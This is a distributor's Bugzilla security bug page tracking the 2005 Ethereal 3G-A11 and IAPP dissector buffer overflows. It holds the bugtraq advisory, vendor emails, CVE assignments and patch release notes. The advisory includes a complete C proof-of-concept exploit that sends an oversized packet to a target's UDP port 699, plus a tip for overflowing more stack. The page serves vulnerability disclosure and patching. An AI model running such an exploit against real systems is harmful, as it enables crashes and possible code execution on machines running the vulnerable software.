Bugzilla – Bug 71777
VUL-0: CVE-2005-0739: ethereal buffer overflow
Last modified: 2021-10-27 08:46:45 UTC
We received the following report via bugtraq. The issue is public. Date: Tue, 8 Mar 2005 02:16:24 +0100 From: LSS Security <exposed@lss.hr> To: bugtraq@securityfocus.com Subject: Ethereal remote buffer overflow User-Agent: Mutt/1.5.6i X-Spam-Level: LSS Security Advisory #LSS-2005-03-04 http://security.lss.hr --- Title : Ethereal remote buffer overflow Advisory ID : LSS-2005-03-04 Date : 08.03.2005 Advisory URL: : http://security.lss.hr/en/index.php?page=exp Impact : Stack overflow and possible code execution Risk level : High Vulnerability type : Remote Vendors contacted : Yes --- ===[ Overview Ethereal is used by network professionals around the world for troubleshooting, analysis, software and protocol development, and education. It has all of the standard features you would expect in a protocol analyzer, and several features not seen in any other product. Its open source license allows talented experts in the networking community to add enhancements. It runs on all popular computing platforms, including Unix, Linux, and Windows. ===[ Vulnerability There is remote buffer overflow vulnerability in Ethereal dissector for CDMA2000 A11 packets. Vulnerability is located in dissect_a11_radius() function in packet-3g-a11.c used for RADIUS authentication dissection. Number of bytes that will be copied from packet to buffer in stack is taken from packet itself. 16 bytes are reserved for that buffer, and string length can be up to 256 bytes (unsigned char), so is possible to overflow local variables and return address. packet-3g-a11.c: ---------------- #define MAX_STRVAL 16 ... dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len) { ... size_t radius_len; ... guchar str_val[MAX_STRVAL]; ... radius_len = tvb_get_guint8(tvb, offset + 1); ... strncpy(str_val, tvb_get_ptr(tvb,offset+2,radius_len-2), radius_len-2); ... } ---------------- A similar vulnerability was also found in same function few lines below where RADIUS attributes are copied to stack. packet-3g-a11.c: ---------------- #define MAX_STRVAL 16 ... dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len) { ... guint attribute_len; ... guchar str_val[MAX_STRVAL]; ... attribute_len = tvb_get_guint8(tvb, offset + radius_offset + 1); ... case ATTR_TYPE_STR: strncpy(str_val,tvb_get_ptr(tvb,offset+radius_offset+2,attribute_len - 2), attribute_len - 2); ... } ---------------- ===[ Affected versions All versions after 3G-A11 dissector was added to CVS including latest 0.10.9. Vulnerability was tested with latest Ethereal on Linux and Windows. ===[ Fix It seems that that they have fixed that vulnerability just few days ago, and new version will probably be available soon from http://www.ethereal.com. ===[ PoC Exploit Exploit is in attachment, and URL http://security.lss.hr/en/PoC/ ===[ Credits Credits for this vulnerability goes to Leon Juranic. ===[ LSS Security Contact LSS Security Team, <eXposed by LSS> WWW : http://security.lss.hr E-mail : security@LSS.hr Tel : +385 1 6129 775 /* * * Ethereal 3G-A11 remote buffer overflow PoC exploit * -------------------------------------------------- * Coded by Leon Juranic <ljuranic@lss.hr> * LSS Security <http://security.lss.hr/en/> * */ #include <stdio.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/stat.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> main (int argc, char **argv) { int sock; struct sockaddr_in sin; unsigned char buf[1024]; char bla[200]; sock=socket(AF_INET,SOCK_DGRAM,0); sin.sin_family=AF_INET; sin.sin_addr.s_addr = inet_addr(argv[1]); sin.sin_port = htons(699); buf[0] = 22; memset(buf+1,'A',19); buf[20] = 38; *(unsigned short*)&buf[22] = htons(100); *(unsigned short*)&buf[28] = 0x0101; buf[30] = 31; buf[31] = 150; // len for overflow...play with this value if it doesn't work memset (bla,'B',200); strncpy (buf+32,bla,180); sendto (sock,buf,200,0,(struct sockaddr*)&sin,sizeof(struct sockaddr)); }
Additional information from vendor-sec: Date: Tue, 08 Mar 2005 13:27:08 -0600 From: Gerald Combs <gerald@ethereal.com> To: vendor-sec@lst.de Subject: [vendor-sec] Upcoming Ethereal release (0.10.10) fixes three vulnerabilities User-Agent: Mozilla Thunderbird 1.0 (Windows/20041206) X-Spam-Level: Ethereal 0.10.10 is scheduled to be released on Thursday, March 10. It addresses the following security issues: The Etheric dissector was susceptible to a buffer overflow. Versions affected: 0.10.7 to 0.10.9 Fixed in revision: 13176 The GPRS-LLC dissector could crash if the "ignore cipher bit" option was enabled. Versions affected: 0.10.7 to 0.10.9 Fixed in revisions: 13386 (further improvements in 13549 and 13571) The 3GPP2 A11 dissector was susceptible to a buffer overflow. Versions affected: 0.10.3 to 0.10.9 Fixed in revision: 13574 Ethereal's SVN repository can be browsed online at http://anonsvn.ethereal.com/viewcvs/viewcvs.py/ Information on obtaining the source code can be found at http://www.ethereal.com/development.html#source ETA on the official release of 0.10.10 is Date: Tue, 08 Mar 2005 13:27:08 -0600 From: Gerald Combs <gerald@ethereal.com> To: vendor-sec@lst.de Subject: [vendor-sec] Upcoming Ethereal release (0.10.10) fixes three vulnerabilities User-Agent: Mozilla Thunderbird 1.0 (Windows/20041206) X-Spam-Level: Ethereal 0.10.10 is scheduled to be released on Thursday, March 10. It addresses the following security issues: The Etheric dissector was susceptible to a buffer overflow. Versions affected: 0.10.7 to 0.10.9 Fixed in revision: 13176 The GPRS-LLC dissector could crash if the "ignore cipher bit" option was enabled. Versions affected: 0.10.7 to 0.10.9 Fixed in revisions: 13386 (further improvements in 13549 and 13571) The 3GPP2 A11 dissector was susceptible to a buffer overflow. Versions affected: 0.10.3 to 0.10.9 Fixed in revision: 13574 Ethereal's SVN repository can be browsed online at http://anonsvn.ethereal.com/viewcvs/viewcvs.py/ Information on obtaining the source code can be found at http://www.ethereal.com/development.html#source ETA on the official release of 0.10.10 is Thursday, March at 3:00 PM CST (21:00 UTC). Notification will be made via the ethereal-announce mailing list and the web site (http://www.ethereal.com). Please don't hesitate to contact me if you have any questions.Thursday, March at 3:00 PM CST (21:00 UTC). Notification will be made via the ethereal-announce mailing list and the web site (http://www.ethereal.com). Please don't hesitate to contact me if you have any questions.
Changed version to final
Date: Wed, 9 Mar 2005 08:59:39 -0500 From: Josh Bressers <bressers@redhat.com> > The 3GPP2 A11 dissector was susceptible to a buffer overflow. > Versions affected: 0.10.3 to 0.10.9 > Fixed in revision: 13574 This issue has been noticed and is CAN-2005-0699. I'll mail Steve about the other two since they're basically public.
Date: Wed, 9 Mar 2005 16:56:22 -0500 From: Josh Bressers <bressers@redhat.com> To: Gerald Combs <gerald@ethereal.com> Cc: vendor-sec@lst.de Subject: Re: [vendor-sec] Upcoming Ethereal release (0.10.10) fixes three vulnerabilities On Tue, Mar 08, 2005 at 01:27:08PM -0600, Gerald Combs wrote: > Ethereal 0.10.10 is scheduled to be released on Thursday, March 10. It > addresses the following security issues: > > The Etheric dissector was susceptible to a buffer overflow. > Versions affected: 0.10.7 to 0.10.9 > Fixed in revision: 13176 This issue is CAN-2005-0704 > > The GPRS-LLC dissector could crash if the "ignore cipher bit" option > was enabled. > Versions affected: 0.10.7 to 0.10.9 > Fixed in revisions: 13386 (further improvements in 13549 and 13571) This issue is CAN-2005-0705 > > The 3GPP2 A11 dissector was susceptible to a buffer overflow. > Versions affected: 0.10.3 to 0.10.9 > Fixed in revision: 13574 This issue is CAN-2005-0699 -- JB
Date: Wed, 9 Mar 2005 02:33:58 +0100 From: LSS Security <exposed@lss.hr> To: bugtraq@securityfocus.com Subject: RE: Ethereal remote buffer overflow - addon Just a little trick to overflow more stack memory in Ethereal. It is possible to overflow stack with more than 255 - 2 bytes. If radius_len is set to 1, in strncpy() line it is subtracted by two and it will be -1 (0xffffffff -> 4294967295 (unsigned long)). packet-3g-a11.c: ---------------- #define MAX_STRVAL 16 ... dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len) { ... size_t radius_len; ... guchar str_val[MAX_STRVAL]; ... radius_len = tvb_get_guint8(tvb, offset + 1); ... strncpy(str_val, tvb_get_ptr(tvb,offset+2,radius_len-2), radius_len-2); ... } ---------------- ------------------------------------------ Leon Juranic, LSS Security http://security.lss.hr
Just in case we need to mention it in any advisory: Date: Tue, 8 Mar 2005 23:35:01 -0300 From: Diego Giagio <dgiagio@irion.com.br> To: bugtraq@securityfocus.com Cc: Gerald Combs <gerald@ethereal.com> Subject: Re: Ethereal remote buffer overflow > --- > > Title : Ethereal remote buffer overflow > Advisory ID : LSS-2005-03-04 > Date : 08.03.2005 > Advisory URL: : http://security.lss.hr/en/index.php?page=exp > Impact : Stack overflow and possible code execution > Risk level : High > Vulnerability type : Remote > Vendors contacted : Yes > > --- This vulnerability was first discovered by me, on 01/Mar/2005. The vendor was immediatelly contacted, as you can see below: http://marc.theaimsgroup.com/?l=ethereal-dev&m=110973103628823&w=2 http://marc.theaimsgroup.com/?l=ethereal-dev&m=110973731214683&w=2 This vulnerability wouldn't made public until the next Ethereal's version comes out (hopefully 10 or 11 this month), as I dealed with the vendor. A proof-of-concept remote root exploit was made by me, but will only be publicized on schedule. Diego Giagio
Date: Thu, 10 Mar 2005 20:14:37 -0600 From: Gerald Combs <gerald@ethereal.com> To: Josh Bressers <bressers@redhat.com> Cc: vendor-sec@lst.de Subject: Re: [vendor-sec] Upcoming Ethereal release (0.10.10) fixes three vulnerabilities Josh Bressers wrote: > On Tue, Mar 08, 2005 at 01:27:08PM -0600, Gerald Combs wrote: > >>Ethereal 0.10.10 is scheduled to be released on Thursday, March 10. It >>addresses the following security issues: > ... Thanks. Unfortunately, we have one more issue: The IAPP dissector is vulnerable to a buffer overflow. Versions affected: 0.9.1 to 0.9.9 Fixed in revision: 13707 The release has been postponed to tomorrow (March 11) at 11:00 AM CST (17:00 GMT).
From: Martin Schulze <joey@infodrom.org> Sune Kloppenborg Jeppesen wrote: > Any CVE id for the latest issue? > > On Friday 11 March 2005 03:14, Gerald Combs wrote: > > Thanks. Unfortunately, we have one more issue: > > > > The IAPP dissector is vulnerable to a buffer overflow. > > Versions affected: 0.9.1 to 0.9.9 > > Fixed in revision: 13707 Please use CAN-2005-0739 Regards, Joey
From: Gerald Combs <gerald@ethereal.com> That was a typo. It should be 0.9.1 to 0.10.9. Sune Kloppenborg Jeppesen wrote: > Seems like the affected version is wrong here and on the CVE entry.
Created attachment 31679 [details] ethereal-3g-a11.c sample exploit. be careful, might vcontain backdoors
swampid 622
http://www.ethereal.com/appnotes/enpa-sa-00018.html mentiones additional non-security bugs that could make ethereal crash.
ping
Sorry SLES9-SP2 has higher priority. For all that I try backporting patches form stable, but it consumes a lot of time, because the version in older distros is too different ;(.
i think if it is too hard to backport we can also get a waiver to do a version upgrade of ethereal.
Fixed security bugs in 3GPP2 A11, IAPP, sFlow dissectors (CAN-2005-0699, CAN-2005-0739) and submited for sles8, 8.2, 9.0, 9.1, sles9 and 9.2
/work/src/done/PATCHINFO/ethereal.patch.box /work/src/done/PATCHINFO/ethereal.patch.maintained
packages released
CVE-2005-0739: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)